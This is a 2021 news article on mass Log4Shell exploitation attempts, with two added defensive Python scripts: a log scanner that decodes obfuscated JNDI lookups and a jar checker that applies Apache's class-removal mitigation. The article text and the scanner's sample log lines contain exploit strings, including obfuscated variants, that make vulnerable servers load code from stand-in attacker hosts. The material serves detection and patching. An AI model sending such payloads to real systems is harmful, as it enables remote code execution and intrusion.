UPDATED 13:06 EDT / DECEMBER 13 2021

Researchers detect hundreds of thousands of Log4j cyberattack attempts

Researchers at two cybersecurity companies have detected hundreds of thousands of attempts to launch cyberattacks using the recently disclosed vulnerability in Log4j. 

The number of hacking attempts is particularly alarming because the vulnerability was only publicly disclosed last Thursday. 

Check Point Software Technologies Ltd., a publicly traded cybersecurity provider, said it has blocked more than 800,000 Log4j-related breach attempts. Sophos Group PLC, in turn, has detected “hundreds of thousands” of cyberattacks, the breach prevention giant disclosed on Sunday.

Log4j is a widely used open-source logging library for applications written in the Java programming language. On Thursday, it was revealed that a critical security flaw in Log4j, tracked as CVE-2021-44228 and nicknamed Log4Shell, can be used by attackers to breach vulnerable systems. Check Point Software has called the flaw “one of the most serious vulnerabilities on the internet in recent years.”

There are several reasons why the vulnerability is so severe. One is the fact that Log4j is widely used in enterprise applications: The tool has been downloaded more than 400,000 times from GitHub to date. Moreover, Log4j is bundled as a dependency in many popular open-source frameworks and commercial products, so organizations may be running it without knowing it. Apple Inc. and Microsoft Corp. are among the major companies known to use Log4j in some of their systems.

Another reason why the vulnerability represents a major cybersecurity risk is that it’s easy for attackers to exploit. According to Microsoft researchers, an attacker can trigger the vulnerability simply by getting a vulnerable application to log a specially crafted string. The string abuses Log4j’s message lookup feature: a pattern of the form ${jndi:ldap://attacker-host/...} instructs the library to fetch an object over JNDI from a server the attacker controls, which can result in attacker-supplied code being loaded and run by the application.

Applications routinely log data they receive from users, such as the username typed into a login form, a search term or an HTTP header like User-Agent, and Log4j resolves lookups in whatever it is asked to log. According to Microsoft, that means an attacker can compromise a vulnerable application simply by entering the malicious string into its login form, a request header or any other input that ends up in a log line.

“Successful exploitation allows for arbitrary code execution in the targeted application,” Microsoft researchers explained in a blog post. “Attackers do not need prior access to the system to log the string and can remotely cause the logging event by using commands like curl against a target system to log the malicious string in the application log.”

“It is also likely that internal vulnerable systems may be targeted with post-compromise activity for lateral movement within the affected enterprise,” explained researchers from Cisco Systems Inc.’s Talos cybersecurity unit. Lateral movement is the term for cyberattacks that use a compromised device or application to infect other systems in the same network. 

According to Check Point Software, more than 60 variants of the original exploit emerged within 24 hours of its publication, many of them rewriting the malicious string to evade simple pattern-based filters. Microsoft researchers have also determined that hackers are using multiple tactics to target vulnerable systems.
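The following detection example is added here and is not part of the original article or any vendor’s code. It shows how the exploit string described above can be found in web-server access logs even when it is obfuscated: it undoes URL encoding and the common Log4j lookup tricks (the ${x:-y} default-value syntax, including the ${::-j} form, and ${lower:}/${upper:} case changes) before searching for ${jndi:. The log lines, IP addresses and hostnames are constructed for the example; the obfuscation handling covers the variants named in the lead-in, not every trick attackers have used.

```python
import re
from urllib.parse import unquote

# Log4j lookups nest, so attackers hide "jndi" inside other lookups.
# ${name:-value} and ${::-value} resolve to "value"; ${lower:X}/${upper:x} change case.
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# After normalization, look for ${jndi:<scheme>://<host>...}
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+):/*([^/}:\s]+)[^}]*\}?", re.IGNORECASE)


def normalize(text: str) -> str:
    """Undo URL encoding and lookup obfuscation until the string stops changing."""
    text = unquote(unquote(text))  # single and double URL encoding
    while True:
        new = _DEFAULT_RE.sub(lambda m: m.group(1), text)
        new = _CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            new,
        )
        if new == text:
            return text
        text = new


def scan_lines(lines):
    """Return (line_no, scheme, host, normalized_payload) for every line carrying a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI_RE.search(norm)
        if m:
            findings.append((n, m.group(1).lower(), m.group(2), m.group(0)))
    return findings


# Constructed access-log lines (RFC 5737 test addresses, example hostnames); not real traffic.
SAMPLE_LINES = [
    '198.51.100.23 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:14:02:15 +0000] '
    '"GET /login?user=${${lower:j}ndi:${lower:r}mi://203.0.113.7:1099/x} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '198.51.100.23 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Adns%3A%2F%2Fscan.example%2Fz%7D"',
]

if __name__ == "__main__":
    for line_no, scheme, host, payload in scan_lines(SAMPLE_LINES):
        print(f"line {line_no}: {scheme} lookup to {host}: {payload}")
```

Run it over a real access log by replacing SAMPLE_LINES with the file’s lines; the hosts it extracts are the callback servers worth blocking at the egress firewall and hunting for across other logs. Treat a clean scan as a weak signal only: the normalization handles the variants listed above, new obfuscations keep appearing, and patching is the actual fix.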

The Apache Software Foundation, which is responsible for the development of Log4j, has released a fixed version, Log4j 2.15.0, that closes the vulnerability. The open-source group also published guidance for administrators who cannot upgrade immediately, including removing the JndiLookup class from the log4j-core jar so that the lookup can no longer be triggered.
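As an added example, not part of the original article or of the Log4j project’s own tooling, the script below does the two things an administrator needs at this step: it checks a log4j-core jar for its version and for the presence of the JndiLookup class, and it applies the class-removal mitigation by writing a copy of the jar without that class. The version range it treats as affected (2.x releases before 2.15.0) reflects the advisory as of this article’s date; later Apache releases superseded 2.15.0, so the FIRST_FIXED constant is an assumption to update against the project’s security page. The sample jar it builds is constructed, with placeholder bytes in place of real bytecode.

```python
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FIRST_FIXED = (2, 15, 0)  # assumption: first fixed release at the time of the article


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Non-numeric suffixes are dropped."""
    parts = []
    for piece in re.split(r"[.\-]", text):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def inspect_jar(path):
    """Report the log4j-core version in a jar and whether JndiLookup.class is still inside it."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_lookup = JNDI_LOOKUP_CLASS in names
    if version is None:
        verdict = "jndi-lookup-present" if has_lookup else "unknown"
    elif parse_version(version) >= FIRST_FIXED:
        verdict = "patched"
    elif parse_version(version) < (2,):
        verdict = "not-affected"  # Log4j 1.x is out of scope for this CVE
    elif has_lookup:
        verdict = "vulnerable"
    else:
        verdict = "mitigated"  # affected version, but the lookup class has been removed
    return {"version": version, "jndi_lookup_present": has_lookup, "verdict": verdict}


def strip_jndi_lookup(src, dst):
    """Copy src to dst without JndiLookup.class (Apache's documented class-removal mitigation)."""
    removed = False
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            if item.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue
            zout.writestr(item, zin.read(item.filename))
    return removed


def scan_tree(root):
    """Yield (path, report) for every .jar under root; nested jars inside wars are not opened."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".jar"):
                path = os.path.join(dirpath, name)
                yield path, inspect_jar(path)


def build_sample_jar(path, version):
    """Constructed stand-in for a log4j-core jar: real entry layout, placeholder class bytes."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                     "artifactId=log4j-core\n" f"version={version}\n")
        jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe placeholder, not real bytecode")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe placeholder")


def demo(version="2.14.1"):
    """Build a sample jar of the given version, check it, apply the mitigation, check again."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, f"log4j-core-{version}.jar")
        dst = os.path.join(tmp, f"log4j-core-{version}-nojndi.jar")
        build_sample_jar(src, version)
        before = inspect_jar(src)["verdict"]
        strip_jndi_lookup(src, dst)
        after = inspect_jar(dst)["verdict"]
    return before, after


if __name__ == "__main__":
    print(demo("2.14.1"))  # vulnerable before, mitigated after
    print(demo("2.15.0"))  # already patched either way
```

Point scan_tree at the application’s lib directories to get an inventory before touching anything, and keep the original jar until the application has been restarted and tested with the stripped copy. The scanner reads only pom.properties and the entry list, so a jar repackaged under another name or shaded into a fat jar still needs the class-presence check rather than the version string alone; jars nested inside war or ear files have to be extracted first.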

A number of cybersecurity providers, including Sophos, Check Point Software, Cloudflare Inc. and others, have taken steps to protect customers whose infrastructure may contain vulnerable Log4j deployments. 
